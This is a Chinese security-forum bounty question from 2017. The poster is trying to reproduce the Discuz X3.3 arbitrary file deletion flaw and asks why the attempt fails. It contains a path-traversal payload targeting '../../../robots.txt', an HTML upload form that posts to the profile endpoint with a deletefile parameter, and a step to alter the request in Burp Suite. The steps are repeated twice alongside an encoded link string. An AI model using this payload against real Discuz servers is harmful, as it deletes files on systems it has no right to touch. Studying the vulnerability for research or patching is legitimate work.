-
-
未解决 [悬赏]discuz x3.3任意文件删除漏洞删除失败 10.00雪花
-
发表于: 2017-10-2 03:20
-
①构造提交
6bcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8*7i4K6u0W2j5$3!0E0i4K6u0r3x3#2)9J5k6e0y4Q4x3V1k6Z5L8$3#2W2i4K6u0W2M7r3S2H3i4K6y4r3L8h3!0V1i4K6y4p5M7%4m8S2j5$3g2U0M7q4)9J5y4X3q4E0M7q4)9K6b7X3q4U0i4K6y4p5M7s2u0G2k6X3W2D9k6g2)9J5y4X3q4E0M7q4)9K6b7X3!0H3i4K6y4p5j5X3q4K6k6b7`.`.
birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7
②上传 robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data"> <inputtype="file"name="birthprovince"id="file"/>
<inputtype="text"name="formhash"value="30ff14a7"/></p>
<inputtype="text"name="profilesubmit"value="1"/></p>
<inputtype="submit"value="Submit"/>
</form>
③burpsuite改包
问 ① : 改了如图 请问哪里操作失误 才不行的
问 ② :spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的
6bcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8*7i4K6u0W2j5$3!0E0i4K6u0r3x3#2)9J5k6e0y4Q4x3V1k6Z5L8$3#2W2i4K6u0W2M7r3S2H3i4K6y4r3L8h3!0V1i4K6y4p5M7%4m8S2j5$3g2U0M7q4)9J5y4X3q4E0M7q4)9K6b7X3q4U0i4K6y4p5M7s2u0G2k6X3W2D9k6g2)9J5y4X3q4E0M7q4)9K6b7X3!0H3i4K6y4p5j5X3q4K6k6b7`.`.
birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7
②上传 robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data"> <inputtype="file"name="birthprovince"id="file"/>
<inputtype="text"name="formhash"value="30ff14a7"/></p>
<inputtype="text"name="profilesubmit"value="1"/></p>
<inputtype="submit"value="Submit"/>
</form>
③burpsuite改包
问 ① : 改了如图 请问哪里操作失误 才不行的
问 ② :spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
